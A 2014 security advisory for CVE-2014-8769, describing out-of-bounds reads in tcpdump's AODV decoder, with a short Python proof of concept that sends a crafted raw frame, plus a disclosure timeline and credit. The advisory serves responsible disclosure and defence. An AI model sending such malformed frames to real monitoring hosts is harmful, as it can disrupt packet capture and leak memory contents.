tcpdump 4.6.2 AOVD Unreliable Output

`CVE-2014-8769 tcpdump unreliable output using malformed AOVD payload  
  
1. Background  
  
tcpdump is a powerful command-line packet analyzer. It allows the user   
to intercept and display TCP/IP and other packets being transmitted or   
received over a network to which the computer is attached.  
  
2. Summary Information  
  
It was found out that malformed network traffic (AOVD-based) can lead to   
an abnormal behaviour if verbose output of tcpdump monitoring the   
network is used.  
  
3. Technical Description  
  
The application decoder for the Ad hoc On-Demand Distance Vector (AODV)   
protocol fails to perform input validation and performs unsafe   
out-of-bound accesses. The application will usually not crash, but   
perform out-of-bounds accesses and output/leak larger amounts of invalid   
data, which might lead to dropped packets. It is unknown if other   
payload exists that might trigger segfaults.  
  
To reproduce start tcpdump on a network interface  
  
sudo tcpdump -i lo -s 0 -n -v  
  
(running the program with sudo might hide a possible segfault message on   
certain environments, see dmesg for details)  
  
and use the following python program to generate a frame on the network   
(might also need sudo):  
  
#!/usr/bin/env python  
from socket import socket, AF_PACKET, SOCK_RAW  
s = socket(AF_PACKET, SOCK_RAW)  
s.bind(("lo", 0))  
  
aovd_frame =   
"\x00\x00\x00\x00\x00\x00\x00\x00\x8c\x7a\xdf\x6f\x08\x00\x45\x00\xe6\x3d\xf3\x7f\x40\x00\x40\x11\x30\xc6\x0a\x01\x01\x68\x0a\x02\x02\x02\x02\x8e\x0d\x00\x4b\x00\x00\xe8\x12\x00\x00\x00\x00\x1f\xc6\x51\x35\x97\x00\x24\x8c\x7a\xdf\x6f\x08\x00\x45\x00\xe6\x3d\xf3\x7f\x40\x00\x40\x11\x30\xc6\x0a\x01\x01"  
  
s.send(aovd_frame)  
  
4. Affected versions  
  
Affected versions are 3.8 through 4.6.2  
  
5. Fix  
  
The problem is fixed in the upcoming version tcpdump 4.7.0  
  
6. Advisory Timeline  
  
2014-11-08 Discovered  
2014-11-09 Requested CVE  
2014-11-11 Reported vendor by email  
2014-11-12 Vendor made a fix available as repository patch  
2014-11-13 CVE number received  
2014-11-13 Published CVE advisory  
  
7. Credit  
  
The issue was found by  
  
Steffen Bauch  
Twitter: @steffenbauch  
http://steffenbauch.de  
  
using a slightly enhanced version of american fuzzy lop   
(https://code.google.com/p/american-fuzzy-lop/) created by Michal Zalewski.  
`